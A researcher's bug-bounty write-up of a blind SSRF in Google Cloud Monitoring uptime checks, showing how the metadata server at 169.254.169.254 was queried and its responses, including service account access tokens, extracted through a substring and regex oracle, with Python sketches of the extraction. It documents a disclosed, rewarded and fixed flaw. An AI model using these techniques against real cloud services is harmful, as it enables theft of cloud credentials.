Update 25.01.2021: Added Google engineers' exploit method for getting an access token.
Google Cloud Monitoring (formerly called Stackdriver) is a service that provides monitoring for cloud
resources (VM instances, App Engine, Cloud Functions, ...). It is available from the Google Cloud Console. This service offers monitoring, alerting, uptime checks of cloud resources, and much more. It is important to note that the Google Cloud Monitoring service itself runs on Google Cloud virtual machines.
Every virtual machine in Google Cloud stores its metadata on the metadata server. The metadata include the project ID, service account information, information about the virtual machine itself, and public SSH keys. The metadata can be queried from within the instance (from the IP address 169.254.169.254) or through the Compute Engine API.
One of the features that Google Cloud Monitoring offers is Uptime checks. An Uptime check is a service that periodically sends requests to a resource to see if it responds. A check can be used to determine the availability of an App Engine app, a VM instance, a URL, etc.
I started testing this feature for SSRF by creating an uptime check that sends a request to a URL/IP address. Most of the URLs and IP addresses that are usual SSRF targets were blocked. But since Cloud Monitoring itself runs on Google Cloud VM instances, there was a chance that I could call the metadata endpoints, because the request to the metadata endpoint would be sent from within an instance.
When the metadata are queried from within the virtual machine, the header "Metadata-Flavor: Google" is required for metadata API version "v1" (older versions of the metadata API did not require this header). Luckily, there was an option to add custom headers to the request, so that was not an issue.
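For reference, a v1 metadata query from inside an instance looks like this. A minimal sketch: the request only resolves from within a GCE VM, so it is built but not actually sent here.

```python
import urllib.request

METADATA_BASE = "http://169.254.169.254/computeMetadata/v1/"

def metadata_request(path):
    """Build a v1 metadata request; the Metadata-Flavor header is mandatory."""
    return urllib.request.Request(
        METADATA_BASE + path,
        headers={"Metadata-Flavor": "Google"},
    )

# Example: the project ID endpoint. Calling urllib.request.urlopen(req)
# would only succeed from inside a GCE VM.
req = metadata_request("project/project-id")
```

Without the header, the v1 endpoints answer with an error, which is exactly why the custom-headers option in the uptime check form mattered.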
I created the uptime check with the following parameters:
Custom Headers: Metadata-Flavor: Google (required for /v1/ metadata endpoints)
Then I pressed the Test button at the bottom of the Uptime check creation form, which sent a request to the metadata server and then displayed that the check was successful.
The response I saw was:
Because the response code was 200 and the response time was 2 ms, I was sure that the metadata endpoint was reachable via the uptime check (a request to an external URL would take much longer). The problem was that the response body was not visible; the only two things returned were the response code and the response time. At this point, this was only a blind SSRF.
To get the response body, I used another Uptime check feature - Response validation. Response validation checks whether the response body contains a specific string. An example configuration can be seen in the image below.
The method I used was the following: I started by looking for a single character that is included in the response, by testing all possible characters one by one. Once one character was found, I tried to find the next one by prepending or appending each possible character to the already found string and checking again whether the result was contained in the response. This process is repeated until the full response is parsed from the metadata server.
For example, I would check whether the response contains the characters 'a', 'b', 'c', and so on. Let's say I found that 'c' is contained in the response. I would then prepend or append another character and check whether the response contains 'ca', 'cb', 'cc', ... If I found that 'ca' is in the response, I would try further combinations - 'caa', 'cab', 'cac', ... - and repeat the process until I had the whole response.
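The search described above can be simulated locally. In this sketch the uptime-check oracle is replaced by a plain substring test against a stand-in secret; the function names and the secret value are made up for illustration.

```python
def reconstruct(contains, alphabet, max_len=100):
    """Recover a hidden string given only a substring-containment oracle."""
    # Find a seed character that appears somewhere in the response.
    known = next(c for c in alphabet if contains(c))
    for _ in range(max_len):
        for c in alphabet:
            if contains(c + known):      # try prepending a character
                known = c + known
                break
            if contains(known + c):      # try appending a character
                known = known + c
                break
        else:
            return known                 # no extension found: fully recovered
    return known

# Stand-in for the real oracle (one uptime-check Test request per query).
secret = "computeMetadata"
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
print(reconstruct(lambda s: s in secret, alphabet))
```

Each one-character extension costs up to 2·|alphabet| oracle queries, which is why this works but is slow against a rate-limited API.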
To do the response body validation, I used the endpoint that is called when the Test button in the Uptime check form is pressed.
The request looked like this:
I created a simple Python script that parses the response using the described method automatically. The script is available here - https://gist.github.com/nechudav/0b2e0217ffe31a3cd1c1743c590595e6
With this script, I obtained project-level metadata - the public SSH key, the project name, and other information about the Google Cloud Monitoring project. It was also possible to get instance-level metadata that are the same for all instances (machine type, CPU platform, ...). But I struggled to get instance-level metadata that are unique to each instance, or data that are periodically refreshed (for example, service account tokens or the IP addresses of the instances). This was because the Uptime check service runs on multiple instances across the world (there were about 54 running instances) and the requests made to the service are load-balanced, so there was no assurance that multiple requests would be sent to the same instance. Getting unique instance-level metadata would require sending a large number of requests, which was problematic because the API was rate-limited and it would be very time-consuming. At this point, I did not continue the research.
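A back-of-the-envelope estimate shows why this was expensive: a probe only yields information when it happens to land on the instance whose data you are reconstructing, so with ~54 load-balanced backends every answered question costs on the order of 54 requests. The alphabet size below (~65 token characters, roughly [A-Za-z0-9._-]) is an assumption for illustration.

```python
import math

N_BACKENDS = 54   # running instances the author observed
ALPHABET = 65     # assumed token alphabet size, roughly [A-Za-z0-9._-]

# Linear scan: one containment question per candidate character,
# each repeated ~N_BACKENDS times to hit the right instance.
naive_per_char = N_BACKENDS * ALPHABET

# Binary search over the alphabet instead needs only
# ceil(log2(65)) = 7 questions per character.
bsearch_per_char = N_BACKENDS * math.ceil(math.log2(ALPHABET))

print(naive_per_char, bsearch_per_char)  # → 3510 378
```

That roughly order-of-magnitude reduction per character is what makes the binary-search approach described in the update below practical against a rate-limited API.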
I reported the issue, it got accepted, and Google VRP rewarded me $31,337 for this bug. I'd like to thank the Google VRP team for the reward and the quick response.
Time of report: June 2020
Update: Google engineers found a really nice and clever way to obtain access tokens by reducing the number of requests using binary search and regexes. Below is the comment describing their solution.
We actually ended up writing an exploit to get an access token, after struggling with the same limitation. The two main tricks were binary search for each character (to send fewer requests) and probing both positive and negative matches (to get reliable results). For example:
One of those requests must eventually return a success response when we hit the correct backend. We'd repeat queries (up to some limit) until we get any OK response and then adjust the search space based on that.
Thanks to regexps you can probe multiple characters in parallel.
In the beginning tokens will overlap, but after ~10 characters or so we usually had a unique prefix. Access tokens are valid for 60 minutes, so on average you have 30 minutes.
In the end the exploit took ~15 minutes to get a full access token, including rate limiting.
Fun bug. :)
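Their binary-search idea can be sketched as a local simulation. Here the uptime-check content match is replaced by an anchored re.match against a made-up token; the function names are invented, and the real exploit additionally had to repeat each probe until it hit the right backend.

```python
import re
import string

ALPHABET = string.ascii_letters + string.digits + "._-"

def next_char(probe, known):
    """Binary-search the character following `known` using regex
    character classes: ~7 questions instead of one per candidate."""
    cands = list(ALPHABET)
    while len(cands) > 1:
        half = cands[: len(cands) // 2]
        charset = "".join(re.escape(c) for c in half)
        if probe(re.escape(known) + "[" + charset + "]"):
            cands = half                  # next char is in the first half
        else:
            cands = cands[len(half):]     # next char is in the second half
    return cands[0]

def extract(probe):
    """Recover the whole secret, one binary-searched character at a time."""
    known = ""
    while probe(re.escape(known) + "."):  # does any character follow?
        known += next_char(probe, known)
    return known

# Stand-in for the uptime-check oracle: anchored match against a fake token
# ("ya29." is the usual GCP access-token prefix; the rest is invented).
secret = "ya29.fake-token_EXAMPLE"
probe = lambda regex: re.match(regex, secret) is not None
print(extract(probe))
```

The character-class probe is what lets a single request rule out half of the remaining candidates at once, which is the source of the speedup over the linear character-by-character search.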